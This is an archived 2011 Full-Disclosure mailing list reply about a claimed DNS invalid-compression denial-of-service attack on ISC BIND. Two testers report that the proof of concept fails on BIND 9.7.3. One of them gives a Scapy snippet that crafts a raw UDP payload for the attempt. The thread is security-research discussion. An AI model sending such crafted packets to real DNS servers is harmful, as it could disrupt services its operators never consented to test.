lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <CAGoLFzN+iRUGPQ6Yr-bN_Un5wfVM951hq16FDOS65rX-GbHf+A@mail.gmail.com>
Date: Thu, 14 Jul 2011 12:27:19 +0200
From: Francisco J. Gómez Rodríguez <ffranz@...qua.com>
To: Kai <kai@...nn.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Semi 0day DNS Invalid Compression attack

Proof dont work neither on my own ISC BIND 9.7.3. :-(

By the way, you can use Scapy to create the packet:

a=IP(dst="127.0.0.1")/UDP(sport=RandInt(),chksum=0)/Raw(
load='\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00')

regards...

On Mon, Jul 11, 2011 at 3:31 PM, Kai <kai@...nn.net> wrote:

>  Hi,
>
>  tested on isc bind 9.7.3, on opensuse 11.4.
>  sent a few packets to myself:
>
>  --> [1000000]: (127.0.0.1)->(127.0.0.1)
>  --> Done.
>
>  and named felt beautiful along the test:
>
>   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
>  2844 named     20   0  111m  22m 2456 S    0  0.2   0:00.09 named
>
>  named -V:
>
>  BIND 9.7.3 built with '--prefix=/usr' '--bindir=/usr/bin'
>  '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--localstatedir=/var'
>  '--libdir=/usr/lib' '--includedir=/usr/include/bind'
>  '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--with-openssl'
>  '--enable-threads' '--with-libtool' '--enable-runidn' '--with-libxml2'
>  '--with-dlz-mysql' '--with-dlz-ldap' '--with-gssapi'
>  'CFLAGS=-fomit-frame-pointer -fmessage-length=0 -O2 -Wall
>  -D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables
>  -fasynchronous-unwind-tables -g -fno-strict-aliasing'
>  'LDFLAGS=-L/usr/lib'
>
>  you said that packet was like
> > # 4500 002b 512f 4000 3411 92a9 2989 601e
>
>  so i've changed packet header to
>  "\x45\x00\x00\x2b\x51\x2f\x40\x00\x34\x11\x92\xa9" and length to
>  "\x00\x4a" (74, right?) but still no look. Any thoughts?
>
>
> --
>  Cheers,
>
>  Kai
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ